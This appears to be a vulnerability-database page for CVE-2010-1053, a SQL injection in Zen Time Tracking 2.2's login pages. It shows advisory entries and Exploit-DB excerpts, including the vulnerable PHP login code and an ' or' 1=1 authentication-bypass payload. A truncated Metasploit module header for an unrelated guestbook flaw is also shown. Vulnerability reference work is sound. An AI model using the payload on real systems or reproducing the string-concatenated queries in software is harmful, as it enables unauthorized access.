CVE-2010-1053
published 2010-03-23CVE-2010-1053: Multiple SQL injection vulnerabilities in Zen Time Tracking 2.2 and earlier, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL…
PriorityP340medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
0.91%
55.6th percentile
Multiple SQL injection vulnerabilities in Zen Time Tracking 2.2 and earlier, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters to (a) userlogin.php and (b) managerlogin.php. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zentracking | zen_time_tracking | <= 2.2 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Zentracking Zen Time Tracking up to 2.2 userlogin.php sql injection (EDB-11345 / XFDB-56146)
vuldb·2026-05-03·CVSS 6.8
CVE-2010-1053 [MEDIUM] Zentracking Zen Time Tracking up to 2.2 userlogin.php sql injection (EDB-11345 / XFDB-56146)
A vulnerability has been found in Zentracking Zen Time Tracking up to 2.2 and classified as critical. Affected is an unknown function of the file userlogin.php. Performing a manipulation results in sql injection.
This vulnerability was named CVE-2010-1053. The attack may be initiated remotely. In addition, an exploit is available.
It is suggested to enhance authentication.
GHSA
GHSA-fj99-v4gr-wrxc: Multiple SQL injection vulnerabilities in Zen Time Tracking 2
ghsa_unreviewed·2022-05-02
CVE-2010-1053 [MEDIUM] CWE-89 GHSA-fj99-v4gr-wrxc: Multiple SQL injection vulnerabilities in Zen Time Tracking 2
Multiple SQL injection vulnerabilities in Zen Time Tracking 2.2 and earlier, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters to (a) userlogin.php and (b) managerlogin.php. NOTE: some of these details are obtained from third party information.
No detection rules found.
Exploit-DB
The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit)
exploitdb·2010-07-03
CVE-1999-1053 The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit)
The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit)
---
##
# $Id: guestbook_ssi_exec.rb 9671 2010-07-03 06:21:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Matt Wright guestbook.pl Arbitrary Command Execution',
'Description' => %q{
The Matt Wright guestbook.pl [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9671 $',
'References' =>
[
[ 'CVE', '1999-1053' ],
[ 'OSVDB', '84' ],
[ 'BID', '776' ],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
Exploit-DB
Zen Tracking 2.2 - Authentication Bypass
exploitdb·2010-02-07
CVE-2010-1053 Zen Tracking 2.2 - Authentication Bypass
Zen Tracking 2.2 - Authentication Bypass
---
[+] Zen Tracking
[+] Download : http://scripts.ringsworld.com/calendars/zentimetracking/
[+] Vuln Code :
[userlogin.php]
if (!empty($_POST['password']))
{
$username =$_POST['username'];
$password =$_POST['password'];
dbConnect();
$result1 = mysql_query("select * from ".$tbluser." where username='". $username ."' and password='". $password ."'". mysql_error());
[+] PoC :
[ZenTracking_path]/userlogin.php
username: ' or' 1=1
Password: ' or' 1=1
[+] Vuln Code :
[managerlogin.php]
if (!empty($_POST['password']))
{
$username =$_POST['username'];
$password =$_POST['password'];
dbConnect();
$result1 = mysql_query("select * from ".$tblmanager." where username='". $username ."' and password='". $password ."'". mysql_error());
[+] PoC :
[ZenT
No writeups or analysis indexed.
2010-03-23
Published